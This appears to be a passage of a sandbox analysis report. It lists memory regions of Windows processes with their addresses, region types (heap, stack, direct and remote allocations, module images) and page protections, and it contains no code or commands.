heap
page read and write
7FF8E7025000
unkown
page readonly
24F21C70000
heap
page read and write
7FF8F8461000
unkown
page execute read
185BD830000
direct allocation
page read and write
2085DCA9000
heap
page read and write
28CCB39D000
heap
page read and write
7FF8F8513000
unkown
page execute read
2085E1C6000
heap
page read and write
7FF8E7751000
unkown
page readonly
185BB677000
heap
page read and write
2085C2CB000
heap
page read and write
185BD7C0000
direct allocation
page read and write
2085E0B2000
heap
page read and write
29612633000
heap
page read and write
20860120000
direct allocation
page read and write
185BBE1D000
heap
page read and write
18FDF278000
heap
page read and write
2085E0C2000
heap
page read and write
185BBCBF000
heap
page read and write
171C434E000
heap
page read and write
4EAC39F000
stack
page read and write
185BB6F0000
heap
page read and write
185BC826000
heap
page read and write
185BB7B3000
heap
page read and write
7FF8E71D0000
unkown
page readonly
185BBBA0000
heap
page read and write
185BB677000
heap
page read and write
2085F07A000
heap
page read and write
18FDF277000
heap
page read and write
7FF8E77C1000
unkown
page write copy
7FF7C3D1E000
unkown
page write copy
185BC79E000
heap
page read and write
185BBE45000
heap
page read and write
185BBBB6000
heap
page read and write
25EFD905000
heap
page read and write
7FF8F8360000
unkown
page readonly
2085E4A8000
heap
page read and write
185BBCB6000
heap
page read and write
25EFD912000
heap
page read and write
171C4338000
heap
page read and write
2085F11E000
heap
page read and write
2085E0BB000
heap
page read and write
2085E683000
heap
page read and write
2085C2A2000
heap
page read and write
2085F14A000
heap
page read and write
7FF8E733E000
unkown
page execute read
171C43CB000
heap
page read and write
18FDF26A000
heap
page read and write
7FF8FF5A2000
unkown
page readonly
2085F21F000
heap
page read and write
185BB71B000
heap
page read and write
185BBECE000
heap
page read and write
185BB34E000
heap
page read and write
18FDF270000
heap
page read and write
2085E586000
heap
page read and write
2085DCD3000
heap
page read and write
2085E7B0000
heap
page read and write
2085C2C0000
heap
page read and write
18FDF26A000
heap
page read and write
2085E1A4000
heap
page read and write
185BD7F0000
direct allocation
page read and write
2085DCD3000
heap
page read and write
185BB854000
heap
page read and write
185BBF28000
heap
page read and write
185B983D000
heap
page read and write
185BB6BC000
heap
page read and write
25EFD905000
heap
page read and write
2085E4AA000
heap
page read and write
7FF8F83A0000
unkown
page readonly
7FF8E774A000
unkown
page write copy
2085E1B3000
heap
page read and write
18FDF277000
heap
page read and write
21D97690000
remote allocation
page read and write
25EFD913000
heap
page read and write
2085E594000
heap
page read and write
7FF8F7AA5000
unkown
page readonly
24F21CA0000
remote allocation
page read and write
20860140000
direct allocation
page read and write
2085E648000
heap
page read and write
1F32FE62000
heap
page read and write
185BBEFA000
heap
page read and write
20860120000
direct allocation
page read and write
7FF8E5F6B000
unkown
page readonly
2085FB1C000
direct allocation
page read and write
2085EE60000
direct allocation
page read and write
185BC88E000
heap
page read and write
185B9815000
heap
page read and write
2085E16B000
heap
page read and write
7FF8E6700000
unkown
page write copy
2085E79D000
heap
page read and write
185BB3E8000
heap
page read and write
185BD595000
heap
page read and write
2085F20E000
heap
page read and write
7FF8F7A05000
unkown
page read and write
2085DC8A000
heap
page read and write
185BBBB3000
heap
page read and write
2085E253000
heap
page read and write
171C43CB000
heap
page read and write
7FF8E5BEF000
unkown
page readonly
7FF8E7A8F000
unkown
page readonly
7FF8F85E5000
unkown
page readonly
2085E5A7000
heap
page read and write
2085DC8E000
heap
page read and write
7FF8E7288000
unkown
page readonly
185BD488000
heap
page read and write
2085DC1A000
heap
page read and write
2085E0A8000
heap
page read and write
2085E77D000
heap
page read and write
24F21CCF000
heap
page read and write
2085E483000
heap
page read and write
2085E1CD000
heap
page read and write
2085F07D000
heap
page read and write
2085E1B3000
heap
page read and write
2085F164000
heap
page read and write
7FF8F846A000
unkown
page read and write
25EFD905000
heap
page read and write
25EFD905000
heap
page read and write
2085F144000
heap
page read and write
24C75910000
heap
page read and write
7FF8E7190000
unkown
page readonly
2085E092000
heap
page read and write
2085E52A000
heap
page read and write
25EFD908000
heap
page read and write
25EFD905000
heap
page read and write
185B9880000
heap
page read and write
185BD800000
direct allocation
page read and write
185BB7D1000
heap
page read and write
18FDF26E000
heap
page read and write
7FF8F856D000
unkown
page readonly
7FF8FF570000
unkown
page readonly
E8996FE000
stack
page read and write
2085E0A6000
heap
page read and write
2085E212000
heap
page read and write
2085E0D0000
heap
page read and write
185BD597000
heap
page read and write
185BB7E5000
heap
page read and write
171C4388000
heap
page read and write
185BC843000
heap
page read and write
185BBBE8000
heap
page read and write
25EFD8E0000
heap
page read and write
25EFD90C000
heap
page read and write
BBB731C000
stack
page read and write
2085E089000
heap
page read and write
185BBE23000
heap
page read and write
185BD7D0000
direct allocation
page read and write
2085E799000
heap
page read and write
2085E574000
heap
page read and write
171C43CB000
heap
page read and write
2085E11D000
heap
page read and write
185BB3A3000
heap
page read and write
185BB3B2000
heap
page read and write
2085E12B000
heap
page read and write
185BB825000
heap
page read and write
7FF8E7DD1000
unkown
page read and write
7FF8E603A000
unkown
page readonly
DA7374D000
stack
page read and write
71A7BFE000
stack
page read and write
2085E156000
heap
page read and write
25EFD8B0000
heap
page read and write
185BC7A2000
heap
page read and write
2085E568000
heap
page read and write
7FF8F8478000
unkown
page readonly
2085E1BD000
heap
page read and write
2085E219000
heap
page read and write
2085DC40000
heap
page read and write
185BBB7A000
heap
page read and write
185BB3D6000
heap
page read and write
185BB41E000
heap
page read and write
185BD2FC000
direct allocation
page read and write
1F32FE20000
heap
page read and write
2085DC1A000
heap
page read and write
2085DCAE000
heap
page read and write
2085E536000
heap
page read and write
2085E48A000
heap
page read and write
185BC86B000
heap
page read and write
62488FF000
stack
page read and write
185BD94C000
direct allocation
page read and write
20860140000
direct allocation
page read and write
25EFD905000
heap
page read and write
185BBBA5000
heap
page read and write
7FF8F7EC2000
unkown
page readonly
2085F36B000
heap
page read and write
2085DCCA000
heap
page read and write
185BB3AE000
heap
page read and write
185BB39D000
heap
page read and write
34013FE000
stack
page read and write
185BD7C0000
direct allocation
page read and write
296125C0000
heap
page read and write
2085DC8D000
heap
page read and write
2085E244000
heap
page read and write
185BB3CD000
heap
page read and write
2085F376000
heap
page read and write
2085E112000
heap
page read and write
185BC700000
heap
page read and write
F3FE0FF000
stack
page read and write
AA5D2FD000
stack
page read and write
185BCA13000
heap
page read and write
7FF8E71BD000
unkown
page readonly
7FF8F7AA0000
unkown
page readonly
185BD810000
direct allocation
page read and write
7FF8F840E000
unkown
page readonly
185BC814000
heap
page read and write
18FDF264000
heap
page read and write
7FF8F7A00000
unkown
page readonly
1A3D6FE000
stack
page read and write
2085E496000
heap
page read and write
185BC3B0000
heap
page read and write
29612642000
heap
page read and write
7FF7C3D0B000
unkown
page readonly
7FF8F8591000
unkown
page execute read
2085F0E6000
heap
page read and write
185BB824000
heap
page read and write
24F21D30000
heap
page read and write
1F4965F0000
heap
page read and write
185BBC89000
heap
page read and write
2085E0DB000
heap
page read and write
185BB699000
heap
page read and write
2085E098000
heap
page read and write
2085E515000
heap
page read and write
10A3F9E000
stack
page read and write
185BB340000
heap
page read and write
2085E1E2000
heap
page read and write
2085F244000
heap
page read and write
185BD7C0000
direct allocation
page read and write
2085E1E0000
heap
page read and write
2085E77D000
heap
page read and write
185BBCB5000
heap
page read and write
2085C2AC000
heap
page read and write
7FF8E6A0F000
unkown
page readonly
25EFD911000
heap
page read and write
7FF8FF571000
unkown
page execute read
2085DCCA000
heap
page read and write
2085E4DB000
heap
page read and write
53166FF000
unkown
page read and write
18FDF26D000
heap
page read and write
7FF8F8363000
unkown
page readonly
18FDF271000
heap
page read and write
2085F0D1000
heap
page read and write
185BBBE4000
heap
page read and write
185BD800000
direct allocation
page read and write
185BB3EC000
heap
page read and write
185BB3B2000
heap
page read and write
20D4920E000
heap
page read and write
2085E54D000
heap
page read and write
29612619000
heap
page read and write
18FDF1B0000
heap
page read and write
2086027C000
direct allocation
page read and write
2085DC8F000
heap
page read and write
FD19AFD000
stack
page read and write
185BB340000
heap
page read and write
185BB7B8000
heap
page read and write
7FF8E5C00000
unkown
page readonly
7FF8E5FA2000
unkown
page readonly
185BC883000
heap
page read and write
7FF8E6F70000
unkown
page readonly
185BBE99000
heap
page read and write
2085DBFF000
heap
page read and write
185BBBF9000
heap
page read and write
20D493D0000
heap
page read and write
2085E1D2000
heap
page read and write
185BB377000
heap
page read and write
185BBE34000
heap
page read and write
2085F0D6000
heap
page read and write
7FF8E7FA1000
unkown
page execute read
22F6FE90000
heap
page read and write
185BD7F0000
direct allocation
page read and write
20860150000
direct allocation
page read and write
185BBCAE000
heap
page read and write
185BC7AB000
heap
page read and write
2085F1D6000
heap
page read and write
185BB7C0000
heap
page read and write
185BBB95000
heap
page read and write
171C4330000
heap
page read and write
18FDF26A000
heap
page read and write
185BD7D0000
direct allocation
page read and write
185BC7B9000
heap
page read and write
2085F27A000
heap
page read and write
185BBBF3000
heap
page read and write
2085E173000
heap
page read and write
185BC8B3000
heap
page read and write
185BC8B7000
heap
page read and write
7FF8F8741000
unkown
page execute read
2234A8F5000
heap
page read and write
24541A20000
heap
page read and write
185BCACD000
heap
page read and write
1ED9B1E0000
heap
page read and write
2085E63B000
heap
page read and write
18FDF26A000
heap
page read and write
2085DC70000
heap
page read and write
2085E6C1000
heap
page read and write
25EFD905000
heap
page read and write
7FF7C3D1E000
unkown
page write copy
2085DC86000
heap
page read and write
7FF8E6F35000
unkown
page readonly
24541A60000
heap
page read and write
7FF8E72A0000
unkown
page readonly
2085E244000
heap
page read and write
18FDF26B000
heap
page read and write
22F70060000
heap
page read and write
185BB7BC000
heap
page read and write
2085E6BA000
heap
page read and write
7FF8E72A1000
unkown
page execute read
185BB7E3000
heap
page read and write
B167F7E000
stack
page read and write
25EE47DF000
heap
page read and write
29F58026000
heap
page read and write
28CCB397000
heap
page read and write
185BB6B6000
heap
page read and write
20860110000
direct allocation
page read and write
2085E683000
heap
page read and write
2085F1B3000
heap
page read and write
185BBECE000
heap
page read and write
18FDF26A000
heap
page read and write
185BC5F0000
direct allocation
page read and write
7FF8E5F69000
unkown
page execute read
7FF8E8003000
unkown
page readonly
2085F148000
heap
page read and write
2085E7BC000
heap
page read and write
185BBF28000
heap
page read and write
7FF8E6FF0000
unkown
page readonly
2085C29B000
heap
page read and write
185BB6B7000
heap
page read and write
2085E151000
heap
page read and write
185BCAEA000
heap
page read and write
185BBE46000
heap
page read and write
2085E11B000
heap
page read and write
20860100000
direct allocation
page read and write
2085E980000
direct allocation
page read and write
185BD59C000
heap
page read and write
2085DC09000
heap
page read and write
185BBBA8000
heap
page read and write
18FDF26A000
heap
page read and write
2085DC9F000
heap
page read and write
2085DC40000
heap
page read and write
20860120000
direct allocation
page read and write
185BD7F0000
direct allocation
page read and write
185BBE45000
heap
page read and write
25EFD905000
heap
page read and write
29F5805F000
heap
page read and write
25EE47E7000
heap
page read and write
24F21D30000
heap
page read and write
2085C257000
heap
page read and write
279B91D5000
heap
page read and write
18FDF26A000
heap
page read and write
185BB77F000
heap
page read and write
185BB676000
heap
page read and write
25EE481B000
heap
page read and write
185BC828000
heap
page read and write
2085E77D000
heap
page read and write
2085E11A000
heap
page read and write
2085DC56000
heap
page read and write
2085DC04000
heap
page read and write
18FDF274000
heap
page read and write
2085E5AB000
heap
page read and write
185BB70B000
heap
page read and write
5911B4C000
stack
page read and write
185BB333000
heap
page read and write
185BB3E7000
heap
page read and write
2085E648000
heap
page read and write
2085C268000
heap
page read and write
185BB6C2000
heap
page read and write
7FF8F875C000
unkown
page readonly
2085DA90000
heap
page read and write
185BBD50000
heap
page read and write
10A437F000
stack
page read and write
2085DBF7000
heap
page read and write
185BD314000
direct allocation
page read and write
185BB391000
heap
page read and write
7FF8F8515000
unkown
page readonly
7FF8F840C000
unkown
page read and write
185BD7C0000
direct allocation
page read and write
185BB390000
heap
page read and write
29612603000
heap
page read and write
7FF8F83D5000
unkown
page readonly
185BB7B3000
heap
page read and write
18FDF26E000
heap
page read and write
2085E4F1000
heap
page read and write
18FDF271000
heap
page read and write
185BD482000
heap
page read and write
1F32FDE0000
remote allocation
page read and write
25EFF250000
heap
page read and write
2085DC1A000
heap
page read and write
2085C2B1000
heap
page read and write
185BB3A7000
heap
page read and write
7FF8E6FF3000
unkown
page readonly
185BD358000
direct allocation
page read and write
2085C295000
heap
page read and write
2085E090000
heap
page read and write
18FDF271000
heap
page read and write
20860120000
direct allocation
page read and write
25EE480E000
heap
page read and write
7FF8E6F04000
unkown
page read and write
185BB6C8000
heap
page read and write
25EFD905000
heap
page read and write
7FF8F9180000
unkown
page readonly
185BBCA7000
heap
page read and write
There are 3851 hidden memdumps, click here to show them.